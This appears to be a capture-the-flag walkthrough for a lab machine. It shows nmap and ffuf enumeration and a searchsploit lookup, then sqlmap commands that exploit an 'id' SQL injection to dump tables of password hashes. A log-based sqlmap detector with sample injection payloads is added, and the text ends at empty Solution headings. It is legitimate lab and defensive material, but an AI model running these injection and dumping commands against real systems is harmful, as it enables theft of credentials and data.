
A hard machine, a hard start

Synopsis

The box hosts a number of virtual hosts, each adding something to the final chain of execution. One site has a boolean-based SQL injection that grants access to the database. This leaks another virtual host and its database; the old management system there offers a file upload and leaks the hostname of a Roundcube webmail instance. A webshell is uploaded and CVE-2020-12640 in Roundcube is used to include and execute it. Password reuse comes into play at two key points before root is obtained by installing a malicious Node module through a rogue NPM server.

Skills Required

  • Enumeration
  • SQL injection
  • Source code review

Skills Learned

  • PHP file inclusion
  • Npm usage
  • Npm registry

Enumeration

$ ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.165 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$ nmap -p$ports -sC -sV 10.10.11.165

The Nmap scan shows three open ports: 22 running SSH, and 80 and 8000 running different versions of Apache. Since we have no SSH credentials yet, we should visit and enumerate ports 80 and 8000 separately.

Apache - Port 8000

[Screenshot: the page served on port 8000]

Apache - Port 80

A static page; crawling and directory scanning turned up nothing exploitable. Fuzzing subdomains with ffuf reveals exam.seventeen.htb.

$ ffuf -H 'Host: FUZZ.seventeen.htb' -u 'http://seventeen.htb' -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -fw 2760

________________________________________________

 :: Method           : GET
 :: URL              : http://seventeen.htb
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
 :: Header           : Host: FUZZ.seventeen.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response words: 2760
________________________________________________

exam                    [Status: 200, Size: 17375, Words: 3222, Lines: 348, Duration: 51ms]
:: Progress: [17770/17770] :: Job [1/1] :: 1879 req/sec :: Duration: [0:00:21] :: Errors: 0 ::

Add the name to the local hosts file so it resolves

$ echo "10.10.11.165 exam.seventeen.htb" | sudo tee -a /etc/hosts

Search for vulnerabilities related to the exam system with searchsploit

$ searchsploit exam manager system
------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                              |  Path
------------------------------------------------------------------------------------------------------------ ---------------------------------
Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)                                | php/webapps/50103.php
Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)                          | php/webapps/50111.py
Exam Reviewer Management System 1.0 - Remote Code Execution (RCE) (Authenticated)                           | php/webapps/50726.txt
Exam Reviewer Management System 1.0 - ‘id’ SQL Injection                                                    | php/webapps/50725.txt
------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

Without credentials, vulnerabilities that need no authentication take priority. Looking at how the SQL injection can be exploited: the exploit file already lists the payload, and the injection point is the id parameter.

$ searchsploit -x /php/webapps/50725.txt
# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
# Date: 2022-02-18

<SNIP>

*SQLMAP COMMAND*
*# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1
<http://127.0.0.1/erms/?p=take_exam&id=1>" -p id --dbs --level 3*

sqlmap

$ sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" -p id --dbs --level 3 --batch  # list the database names
<SNIP>
available databases [4]:
[*] db_sfms
[*] erms_db
[*] information_schema
[*] roundcubedb

$ sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" -p id --dbs --level 3 --batch -D db_sfms --tables

[3 tables]
+---------+
| user    |
| storage |
| student |
+---------+

$ sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" -p id --dbs --level 3 --batch -D db_sfms -T student --threads=10 --dump

Database: db_sfms
Table: student
[4 entries]
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| stud_id | yr | gender | stud_no | lastname | password                                           | firstname |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| 1       | 1A | Male   | 12345   | Smith    | 1a40620f9a4ed6cb8d81a1d365559233                   | John      |
| 2       | 2B | Male   | 23347   | Mille    | abb635c915b0cc296e071e8d76e9060c                   | James     |
| 3       | 2C | Female | 31234   | Shane    | a2afa567b1efdb42d8966353337d9024 (autodestruction) | Kelly     |
| 4       | 3C | Female | 43347   | Hales    | a1428092eb55781de5eb4fd5e2ceb835                   | Jamie     |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+

The folder oldmanagement under the parent directory /var/www (visible in the avatar path below) suggests it may be another virtual host.

$ sqlmap -u "http://exam.seventeen.htb/?p=take_exam&id=1" -p id --dbs --level 3 --batch -D erms_db -T users --threads=10 --dump
Database: erms_db
Table: users
[3 entries]
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| id | type | avatar                            | lastname | password                         | username         | firstname    | date_added          | last_login | date_updated        |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| 1  | 1    | ../oldmanagement/files/avatar.png | Admin    | fc8ec7b43523e186a27f46957818391c | admin            | Adminstrator | 2021-01-20 14:02:37 | NULL       | 2022-02-24 22:00:15 |
| 6  | 2    | ../oldmanagement/files/avatar.png | Anthony  | 48bb86d036bb993dfdcf7fefdc60cc06 | UndetectableMark | Mark         | 2021-09-30 16:34:02 | NULL       | 2022-05-10 08:21:39 |
| 7  | 2    | ../oldmanagement/files/avatar.png | Smith    | 184fe92824bea12486ae9a56050228ee | Stev1992         | Steven       | 2022-02-22 21:05:07 | NULL       | 2022-02-24 22:00:24 |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
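The sqlmap runs above leave a very recognisable trace on the server side: a burst of requests from one address in which the id parameter stops being a plain integer (AND 1=1 / AND 1=2 pairs, SLEEP probes, comment terminators), usually with the default sqlmap User-Agent. The following detector, an added example and not part of the original writeup, runs that check over constructed Apache access-log lines that imitate the exam vhost traffic (the log lines, IPs and sizes are made up for the example).

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the target): one normal
# request, three sqlmap-style probes on ?id=, then another normal request.
SAMPLE_LOG = """\
10.10.14.5 - - [25/Sep/2022:22:41:10 +0000] "GET /?p=take_exam&id=1 HTTP/1.1" 200 17375 "-" "Mozilla/5.0"
10.10.14.5 - - [25/Sep/2022:22:41:12 +0000] "GET /?p=take_exam&id=1%20AND%201%3D1 HTTP/1.1" 200 17375 "-" "sqlmap/1.6.9#stable (https://sqlmap.org)"
10.10.14.5 - - [25/Sep/2022:22:41:12 +0000] "GET /?p=take_exam&id=1%20AND%201%3D2 HTTP/1.1" 200 17102 "-" "sqlmap/1.6.9#stable (https://sqlmap.org)"
10.10.14.5 - - [25/Sep/2022:22:41:13 +0000] "GET /?p=take_exam&id=1%27%20AND%20SLEEP(5)--%20- HTTP/1.1" 200 17102 "-" "sqlmap/1.6.9#stable (https://sqlmap.org)"
10.10.14.9 - - [25/Sep/2022:22:42:00 +0000] "GET /?p=take_exam&id=2 HTTP/1.1" 200 17380 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method target proto" status size "referer" "ua"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d+) (?P<size>\d+) "[^"]*" "(?P<ua>[^"]*)"')

# Ordered probe signatures; the boolean pair (1=1 vs 1=2) is the oracle sqlmap
# uses, and the differing response sizes (17375 vs 17102) confirm it.
INJECTION_MARKERS = (
    ("boolean", re.compile(r"\b(AND|OR)\b\s+[\w'\"]+\s*=", re.I)),
    ("time_based", re.compile(r"\b(SLEEP|BENCHMARK|WAITFOR)\b", re.I)),
    ("comment", re.compile(r"(--|#|/\*)")),
)

def parse_line(line):
    """Parse one combined-format line; parse_qs decodes %xx the way PHP's $_GET would."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["params"] = parse_qs(urlsplit(rec["target"]).query, keep_blank_values=True)
    return rec

def classify_id(value):
    """'ok' for a well-formed integer id, otherwise the kind of probe seen."""
    if re.fullmatch(r"\d+", value):
        return "ok"
    for name, rx in INJECTION_MARKERS:
        if rx.search(value):
            return name
    return "malformed"

def scan_log(text):
    """One finding per request whose id parameter is not a plain integer."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec or "id" not in rec["params"]:
            continue
        for value in rec["params"]["id"]:
            kind = classify_id(value)
            if kind != "ok":
                findings.append({"ip": rec["ip"], "kind": kind, "value": value,
                                 "ua_is_sqlmap": rec["ua"].lower().startswith("sqlmap")})
    return findings

def summarize(findings):
    """Probe count per source IP; a burst from a single IP is the sqlmap signature."""
    return Counter(f["ip"] for f in findings)
```

Alerting on the per-IP count rather than on a single odd value keeps ordinary typos out of the queue while still catching a --batch run like the one above within its first few seconds.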

$ echo '10.129.227.143 oldmanagement.seventeen.htb' | sudo tee -a /etc/hosts

This gives a login page. Log in with a student number plus password; the password obtained from the earlier sqlmap dump lets us in.
[Screenshot: oldmanagement login page]
There is a downloadable PDF and a file upload function. Viewing the PDF reveals the virtual host mastermailer.seventeen.htb.
[Screenshot: PDF contents]

$ echo '10.129.119.55 mastermailer.seventeen.htb' | sudo tee -a /etc/hosts


Solution

Walkthrough